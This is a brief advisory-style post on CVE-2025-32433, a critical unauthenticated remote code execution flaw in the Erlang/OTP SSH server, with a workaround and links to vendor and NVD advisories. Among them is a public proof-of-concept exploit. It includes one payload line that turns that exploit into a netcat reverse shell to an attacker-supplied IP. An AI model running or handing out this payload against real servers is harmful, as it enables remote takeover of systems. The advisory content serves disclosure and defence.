Erlang, a programming language for building scalable real-time systems with high availability, forms a powerful ecosystem with the Open Telecom Platform (OTP) framework. Erlang/OTP SSH, an implementation of the SSH protocol, enables secure shell access and file transfers within Erlang-based systems.
On April 16, 2025, a critical vulnerability in the Erlang/OTP SSH server was disclosed. This vulnerability could allow an unauthenticated, remote attacker to perform remote code execution (RCE) on an affected device. CVE-2025-32433 is rated with a severity level 10/10.
If upgrade is not possible, then disable SSH as a temporary workaround.
PoC Exploit URL : https://github.com/ProDefense/CVE-2025-32433
In this PoC, the payload is harmless. It creates the file lab.txt with the contents being pwned. If needed to create a more serious payload or RCE, it must be written in Erlang language.
For example, for having a netcat reverse shell payload, use the following comment (by editing the PoC script).
command='os:cmd("nc <Your_IP> 4444 -e /bin/bash").'
The vulnerability allows for unauthenticated remote code execution by malicious actors with network access to hosts running an Erlang/OTP SSH server. This could lead to compromise allowing unauthorized access data manipulation or denial-of-service attacks.
Many vendors and their products are affected.
For Cisco’s advisory, refer https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-erlang-otp-ssh-xyZZy
NIST NVD : https://nvd.nist.gov/vuln/detail/CVE-2025-32433
Erlang Advisory : https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2